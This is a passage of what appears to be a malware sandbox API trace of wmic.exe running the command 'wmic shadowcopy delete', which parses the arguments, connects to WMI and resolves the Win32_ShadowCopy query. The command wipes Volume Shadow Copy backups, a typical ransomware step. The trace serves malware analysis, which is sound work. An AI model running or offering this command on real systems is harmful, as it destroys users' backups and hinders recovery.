(param_1="htable-sortby") returned 0xd [0129.625] SysStringLen (param_1="texttablewsys") returned 0xd [0129.625] SysStringLen (param_1="htable-sortby") returned 0xd [0129.625] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0129.625] SysStringLen (param_1="XML") returned 0x3 [0129.625] SysStringLen (param_1="htable-sortby") returned 0xd [0129.625] malloc (_Size=0x18) returned 0x33c2bb0 [0129.625] malloc (_Size=0xc) returned 0x33cab00 [0129.625] free (_Block=0x33cab00) [0129.625] malloc (_Size=0xc) returned 0x33cac08 [0129.625] malloc (_Size=0xc) returned 0x33cab78 [0129.625] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0129.625] SysStringLen (param_1="TABLE") returned 0x5 [0129.625] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0129.625] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.625] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0129.626] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.626] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0129.626] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0129.626] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.626] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0129.626] malloc (_Size=0x18) returned 0x33c28d0 [0129.626] malloc (_Size=0xc) returned 0x33ca968 [0129.626] free (_Block=0x33ca968) [0129.626] malloc (_Size=0xc) returned 0x33cab90 [0129.626] malloc (_Size=0xc) returned 0x33ca968 [0129.626] SysStringLen (param_1="wmiclimofformat") returned 0xf [0129.626] SysStringLen (param_1="TABLE") returned 0x5 [0129.626] SysStringLen (param_1="wmiclimofformat") returned 0xf [0129.626] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.626] SysStringLen (param_1="wmiclimofformat") returned 0xf [0129.626] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.626] SysStringLen (param_1="wmiclimofformat") returned 0xf [0129.626] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0129.626] SysStringLen (param_1="wmiclimofformat") returned 0xf [0129.627] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0129.627] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.627] SysStringLen (param_1="wmiclimofformat") returned 0xf [0129.627] malloc (_Size=0x18) returned 0x33c2c70 [0129.627] malloc (_Size=0xc) returned 0x33caab8 [0129.627] free (_Block=0x33caab8) [0129.627] malloc (_Size=0xc) returned 0x33caab8 [0129.627] malloc (_Size=0xc) returned 0x33caa28 [0129.627] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0129.627] SysStringLen (param_1="TABLE") returned 0x5 [0129.627] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0129.627] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.627] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0129.627] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.627] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0129.627] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0129.627] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0129.627] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0129.627] malloc (_Size=0x18) returned 0x33c2a50 [0129.628] malloc (_Size=0xc) returned 0x33cac20 [0129.628] free (_Block=0x33cac20) [0129.628] malloc (_Size=0xc) returned 0x33caae8 [0129.628] malloc (_Size=0xc) returned 0x33cabd8 [0129.628] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0129.628] SysStringLen (param_1="TABLE") returned 0x5 [0129.628] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0129.628] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0129.628] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0129.628] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0129.628] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0129.628] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0129.628] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0129.628] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0129.628] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0129.628] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0129.628] malloc (_Size=0x18) returned 0x33c2ab0 [0129.629] FreeThreadedDOMDocument:IUnknown:Release (This=0x37445a8) returned 0x0 [0129.629] free (_Block=0x33c9680) [0129.629] GetCommandLineW () returned="wmic shadowcopy delete " [0129.629] malloc (_Size=0x40) returned 0x33c2d38 [0129.629] memcpy_s (in: _Destination=0x33c2d38, _DestinationSize=0x3e, _Source=0x3211b18, _SourceSize=0x30 | out: _Destination=0x33c2d38) returned 0x0 [0129.629] malloc (_Size=0xc) returned 0x33cac20 [0129.629] malloc (_Size=0xc) returned 0x33ca980 [0129.629] malloc (_Size=0xc) returned 0x33cab00 [0129.629] malloc (_Size=0xc) returned 0x33caa58 [0129.629] malloc (_Size=0x80) returned 0x33cad10 [0129.629] GetLocalTime (in: lpSystemTime=0x2eef82c | out: lpSystemTime=0x2eef82c*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x1b, wMilliseconds=0x3b)) [0129.629] _vsnwprintf (in: _Buffer=0x33cad10, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x2eef80c | out: _Buffer="03-16-2020T09:41:27") returned 19 [0129.629] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0129.629] malloc (_Size=0x2a) returned 0x33cad98 [0129.629] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0129.629] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0129.629] malloc (_Size=0x2a) returned 0x33cadd0 [0129.629] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0129.629] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0129.629] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0129.629] malloc (_Size=0x16) returned 0x33c2c90 [0129.629] lstrlenW (lpString="shadowcopy") returned 10 [0129.630] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0129.630] malloc (_Size=0x16) returned 0x33c2af0 [0129.630] malloc (_Size=0x4) returned 0x33cae08 [0129.630] free (_Block=0x0) [0129.630] free (_Block=0x33c2c90) [0129.630] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0129.630] malloc (_Size=0xe) returned 0x33cab18 [0129.630] lstrlenW (lpString="delete") returned 6 [0129.630] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0129.630] malloc (_Size=0xe) returned 0x33ca998 [0129.630] malloc (_Size=0x8) returned 0x33cae18 [0129.630] memmove_s (in: _Destination=0x33cae18, _DestinationSize=0x4, _Source=0x33cae08, _SourceSize=0x4 | out: _Destination=0x33cae18) returned 0x0 [0129.630] free (_Block=0x33cae08) [0129.630] free (_Block=0x0) [0129.630] free (_Block=0x33cab18) [0129.630] lstrlenW (lpString=" shadowcopy delete ") returned 20 [0129.630] malloc (_Size=0x8) returned 0x33cae08 [0129.630] lstrlenW (lpString="QUIT") returned 4 [0129.630] lstrlenW (lpString="shadowcopy") returned 10 [0129.630] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0129.630] lstrlenW (lpString="EXIT") returned 4 [0129.630] lstrlenW (lpString="shadowcopy") returned 10 [0129.630] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0129.630] free (_Block=0x33cae08) [0129.630] WbemLocator:IUnknown:AddRef (This=0x32236c8) returned 0x2 [0129.630] malloc (_Size=0x8) returned 0x33cae08 [0129.630] lstrlenW (lpString="/") returned 1 [0129.630] lstrlenW (lpString="shadowcopy") returned 10 [0129.630] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0129.630] lstrlenW (lpString="-") returned 1 [0129.630] lstrlenW (lpString="shadowcopy") returned 10 [0129.630] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0129.630] lstrlenW (lpString="CLASS") returned 5 [0129.630] lstrlenW (lpString="shadowcopy") returned 10 [0129.630] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0129.630] lstrlenW (lpString="PATH") returned 4 [0129.630] lstrlenW (lpString="shadowcopy") returned 10 [0129.631] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0129.631] lstrlenW (lpString="CONTEXT") returned 7 [0129.631] lstrlenW (lpString="shadowcopy") returned 10 [0129.631] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0129.631] lstrlenW (lpString="shadowcopy") returned 10 [0129.631] malloc (_Size=0x16) returned 0x33c2ad0 [0129.631] lstrlenW (lpString="shadowcopy") returned 10 [0129.631] GetCurrentThreadId () returned 0x13cc [0129.631] ??0CHString@@QAE@XZ () returned 0x2eef784 [0129.631] malloc (_Size=0xc) returned 0x33ca9c8 [0129.631] malloc (_Size=0xc) returned 0x33cab18 [0129.631] WbemLocator:IWbemLocator:ConnectServer (in: This=0x32236c8, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xdf8540 | out: ppNamespace=0xdf8540*=0x322afb0) returned 0x0 [0138.230] free (_Block=0x33cab18) [0138.230] free (_Block=0x33ca9c8) [0138.230] CoSetProxyBlanket (pProxy=0x322afb0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0138.231] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0138.231] GetCurrentThreadId () returned 0x13cc [0138.231] ??0CHString@@QAE@XZ () returned 0x2eef728 [0138.231] malloc (_Size=0xc) returned 0x33ca9c8 [0138.233] malloc (_Size=0xc) returned 0x33cab18 [0138.233] malloc (_Size=0xc) returned 0x33cab30 [0138.233] malloc (_Size=0xc) returned 0x33cab48 [0138.233] SysStringLen (param_1="root\\cli") returned 0x8 [0138.233] SysStringLen (param_1="\\") returned 0x1 [0138.233] malloc (_Size=0xc) returned 0x33cac38 [0138.233] SysStringLen (param_1="root\\cli\\") returned 0x9 [0138.233] SysStringLen (param_1="ms_409") returned 0x6 [0138.233] free (_Block=0x33cab48) [0138.233] free (_Block=0x33cab30) [0138.233] free (_Block=0x33cab18) [0138.233] free (_Block=0x33ca9c8) [0138.233] malloc (_Size=0xc) returned 0x33ca9c8 [0138.233] WbemLocator:IWbemLocator:ConnectServer (in: This=0x32236c8, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xdf8544 | out: ppNamespace=0xdf8544*=0x3258d48) returned 0x0 [0139.583] free (_Block=0x33ca9c8) [0139.583] free (_Block=0x33cac38) [0139.583] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0139.583] GetCurrentThreadId () returned 0x13cc [0139.583] ??0CHString@@QAE@XZ () returned 0x2eef784 [0139.583] malloc (_Size=0xc) returned 0x33cacf8 [0139.583] malloc (_Size=0xc) returned 0x33cacc8 [0139.583] malloc (_Size=0xc) returned 0x33cace0 [0139.583] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0139.583] malloc (_Size=0x3a) returned 0x33cb598 [0139.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xdb14a8, cbMultiByte=-1, lpWideCharStr=0x33cb598, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0139.584] free (_Block=0x33cb598) [0139.584] malloc (_Size=0xc) returned 0x33cac38 [0139.584] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0139.584] SysStringLen (param_1="shadowcopy") returned 0xa [0139.584] malloc (_Size=0xc) returned 0x33cac80 [0139.584] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0139.584] SysStringLen (param_1="'") returned 0x1 [0139.584] free (_Block=0x33cac38) [0139.584] free (_Block=0x33cace0) [0139.584] free (_Block=0x33cacc8) [0139.584] free (_Block=0x33cacf8) [0139.584] IWbemServices:GetObject (in: This=0x322afb0, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x2eef780*=0x0, ppCallResult=0x0 | out: ppObject=0x2eef780*=0x32671f0, ppCallResult=0x0) returned 0x0 [0139.863] malloc (_Size=0xc) returned 0x33cac68 [0139.863] IWbemClassObject:Get (in: This=0x32671f0, wszName="Target", lFlags=0, pVal=0x2eef758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2eef758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0139.864] free (_Block=0x33cac68) [0139.864] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0139.864] malloc (_Size=0x3e) returned 0x33cb598 [0139.864] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0139.864] malloc (_Size=0xc) returned 0x33cacc8 [0139.864] IWbemClassObject:Get (in: This=0x32671f0, wszName="PWhere", lFlags=0, pVal=0x2eef758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2eef758*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0139.864] free (_Block=0x33cacc8) [0139.864] lstrlenW (lpString=" Where ID = '#'") returned 15 [0139.864] malloc (_Size=0x20) returned 0x33cb5e0 [0139.864] lstrlenW (lpString=" Where ID = '#'") returned 15 [0139.864] malloc (_Size=0xc) returned 0x33cacf8 [0139.864] IWbemClassObject:Get (in: This=0x32671f0, wszName="Connection", lFlags=0, pVal=0x2eef758*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2eef758*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3267388, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0139.864] free (_Block=0x33cacf8) [0139.864] IUnknown:QueryInterface (in: This=0x3267388, riid=0xdb6a04*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x2eef774 | out: ppvObject=0x2eef774*=0x3267388) returned 0x0 [0139.864] GetCurrentThreadId () returned 0x13cc [0139.864] ??0CHString@@QAE@XZ () returned 0x2eef6f0 [0139.864] malloc (_Size=0xc) returned 0x33cac98 [0139.864] IWbemClassObject:Get (in: This=0x3267388, wszName="Namespace", lFlags=0, pVal=0x2eef6d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2eef6d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0139.865] free (_Block=0x33cac98) [0139.865] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0139.865] malloc (_Size=0x16) returned 0x33c2b50 [0139.865] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0139.865] malloc (_Size=0xc) returned 0x33cacf8 [0139.865] IWbemClassObject:Get (in: This=0x3267388, wszName="Locale", lFlags=0, pVal=0x2eef6d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x324fd1c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2eef6d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0139.865] free (_Block=0x33cacf8) [0139.865] lstrlenW (lpString="ms_409") returned 6 [0139.865] malloc (_Size=0xe) returned 0x33cacc8 [0139.865] lstrlenW (lpString="ms_409") returned 6 [0139.865] malloc (_Size=0xc) returned 0x33cac98 [0139.865] IWbemClassObject:Get (in: This=0x3267388, wszName="User", lFlags=0, pVal=0x2eef6d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x324fd1c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2eef6d8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0139.865] free (_Block=0x33cac98) [0139.865] malloc (_Size=0xc) returned 0x33cace0 [0139.865] IWbemClassObject:Get (in: This=0x3267388, wszName="Password", lFlags=0, pVal=0x2eef6d8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2eef6d8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0139.865] free (_Block=0x33cace0) [0139.865] malloc (_Size=0xc) returned 0x33cacb0 [0139.865] IWbemClassObject:Get (in: This=0x3267388, wszName="Server", lFlags=0, pVal=0x2eef6d8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2eef6d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0139.865] free (_Block=0x33cacb0) [0139.865] lstrlenW (lpString=".") returned 1 [0139.865] malloc (_Size=0x4) returned 0x33cb608 [0139.865] lstrlenW (lpString=".") returned 1 [0139.866] malloc (_Size=0xc) returned 0x33cac50 [0139.866] IWbemClassObject:Get (in: This=0x3267388, wszName="Authority", lFlags=0, pVal=0x2eef6d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x324fd1c, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2eef6d8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0139.866] free (_Block=0x33cac50) [0139.866] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0139.866] IUnknown:Release (This=0x3267388) returned 0x1 [0139.866] GetCurrentThreadId () returned 0x13cc [0139.866] ??0CHString@@QAE@XZ () returned 0x2eef6e4 [0139.866] malloc (_Size=0xc) returned 0x33cac68 [0139.866] IWbemClassObject:Get (in: This=0x32671f0, wszName="__RELPATH", lFlags=0, pVal=0x2eef6cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2eef6cc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0139.866] free (_Block=0x33cac68) [0139.866] malloc (_Size=0xc) returned 0x33cac68 [0139.866] GetCurrentThreadId () returned 0x13cc [0139.866] ??0CHString@@QAE@XZ () returned 0x2eef660 [0139.866] ??0CHString@@QAE@PBG@Z () returned 0x2eef654 [0139.866] ??0CHString@@QAE@ABV0@@Z () returned 0x2eef5dc [0139.866] ?Empty@CHString@@QAEXXZ () returned 0x6bf465f8 [0139.866] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x33cb618 [0139.866] ?Find@CHString@@QBEHPBG@Z () returned 0x1b [0139.866] ?Left@CHString@@QBE?AV1@H@Z () returned 0x2eef5d4 [0139.866] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x2eef5d8 [0139.866] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x2eef654 [0139.866] ??1CHString@@QAE@XZ () returned 0x1 [0139.866] ??1CHString@@QAE@XZ () returned 0x1 [0139.867] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x2eef5d0 [0139.867] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x2eef5dc [0139.867] ??1CHString@@QAE@XZ () returned 0x1 [0139.867] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x33cb680 [0139.867] ?Find@CHString@@QBEHPBG@Z () returned 0xa [0139.867] ?Left@CHString@@QBE?AV1@H@Z () returned 0x2eef5d4 [0139.867] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0x2eef5d8 [0139.867] ??YCHString@@QAEABV0@ABV0@@Z () returned 0x2eef654 [0139.867] ??1CHString@@QAE@XZ () returned 0x1 [0139.867] ??1CHString@@QAE@XZ () returned 0x1 [0139.867] ?Mid@CHString@@QBE?AV1@H@Z () returned 0x2eef5d0 [0139.867] ??4CHString@@QAEABV0@ABV0@@Z () returned 0x2eef5dc [0139.867] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0139.867] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x6bf465ec [0139.867] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0139.867] malloc (_Size=0xc) returned 0x33cacf8 [0139.867] malloc (_Size=0xc) returned 0x33cacb0 [0139.867] malloc (_Size=0xc) returned 0x33cace0 [0139.867] malloc (_Size=0xc) returned 0x33cac38 [0139.867] malloc (_Size=0xc) returned 0x33cac50 [0139.867] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0139.867] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0139.867] malloc (_Size=0xc) returned 0x33cac98 [0139.867] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0139.867] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0139.867] malloc (_Size=0xc) returned 0x33ca9c8 [0139.867] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0139.867] SysStringLen (param_1="\"") returned 0x1 [0139.868] free (_Block=0x33cac98) [0139.868] free (_Block=0x33cac50) [0139.868] free (_Block=0x33cac38) [0139.868] free (_Block=0x33cace0) [0139.868] free (_Block=0x33cacb0) [0139.868] free (_Block=0x33cacf8) [0139.868] IWbemServices:GetObject (in: This=0x3258d48, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x2eef670*=0x0, ppCallResult=0x0 | out: ppObject=0x2eef670*=0x32678e8, ppCallResult=0x0) returned 0x0 [0139.881] malloc (_Size=0xc) returned 0x33cace0 [0139.881] IWbemClassObject:Get (in: This=0x32678e8, wszName="Text", lFlags=0, pVal=0x2eef638*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x2eef638*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3267eb0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x322b878, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0139.882] free (_Block=0x33cace0) [0139.882] SafeArrayGetLBound (in: psa=0x3267eb0, nDim=0x1, plLbound=0x2eef64c | out: plLbound=0x2eef64c) returned 0x0 [0139.882] SafeArrayGetUBound (in: psa=0x3267eb0, nDim=0x1, plUbound=0x2eef648 | out: plUbound=0x2eef648) returned 0x0 [0139.882] SafeArrayGetElement (in: psa=0x3267eb0, rgIndices=0x2eef664, pv=0x2eef65c | out: pv=0x2eef65c) returned 0x0 [0139.882] malloc (_Size=0xc) returned 0x33cace0 [0139.882] malloc (_Size=0xc) returned 0x33cac98 [0139.882] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0139.882] free (_Block=0x33cace0) [0139.882] IUnknown:Release (This=0x32678e8) returned 0x0 [0139.882] free (_Block=0x33ca9c8) [0139.882] ??1CHString@@QAE@XZ () returned 0x1 [0139.882] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0139.882] free (_Block=0x33cac68) [0139.882] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0139.882] lstrlenW (lpString="Shadow copy management.") returned 23 [0139.882] malloc (_Size=0x30) returned 0x33cb618 [0139.882] lstrlenW (lpString="Shadow copy management.") returned 23 [0139.882] free (_Block=0x33cac98) [0139.882] IUnknown:Release (This=0x32671f0) returned 0x0 [0139.882] free (_Block=0x33cac80) [0139.883] ??1CHString@@QAE@XZ () returned 0x6bf465f8 [0139.883] lstrlenW (lpString="PATH") returned 4 [0139.883] lstrlenW (lpString="delete") returned 6 [0139.883] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0139.883] lstrlenW (lpString="WHERE") returned 5 [0139.883] lstrlenW (lpString="delete") returned 6 [0139.883] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0139.883] lstrlenW (lpString="(") returned 1 [0139.883] lstrlenW (lpString="delete") returned 6 [0139.883] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0139.883] lstrlenW (lpString="/") returned 1 [0139.883] lstrlenW (lpString="delete") returned 6 [0139.883] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0139.883] lstrlenW (lpString="-") returned 1 [0139.883] lstrlenW (lpString="delete") returned 6 [0139.883] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0139.883] malloc (_Size=0xc) returned 0x33cac50 [0139.883] lstrlenW (lpString="GET") returned 3 [0139.883] lstrlenW (lpString="delete") returned 6 [0139.883] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0139.883] lstrlenW (lpString="LIST") returned 4 [0139.883] lstrlenW (lpString="delete") returned 6 [0139.883] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0139.883] lstrlenW (lpString="SET") returned 3 [0139.883] lstrlenW (lpString="delete") returned 6 [0139.883] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0139.883] lstrlenW (lpString="CREATE") returned 6 [0139.883] lstrlenW (lpString="delete") returned 6 [0139.883] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0139.883] lstrlenW (lpString="CALL") returned 4 [0139.884] lstrlenW (lpString="delete") returned 6 [0139.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0139.884] lstrlenW (lpString="ASSOC") returned 5 [0139.884] lstrlenW (lpString="delete") returned 6 [0139.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0139.884] lstrlenW (lpString="DELETE") returned 6 [0139.884] lstrlenW (lpString="delete") returned 6 [0139.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0139.884] free (_Block=0x33cac50) [0139.884] lstrlenW (lpString="/") returned 1 [0139.884] lstrlenW (lpString="delete") returned 6 [0139.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0139.884] lstrlenW (lpString="-") returned 1 [0139.884] lstrlenW (lpString="delete") returned 6 [0139.884] CompareStringW (Locale=0x800, 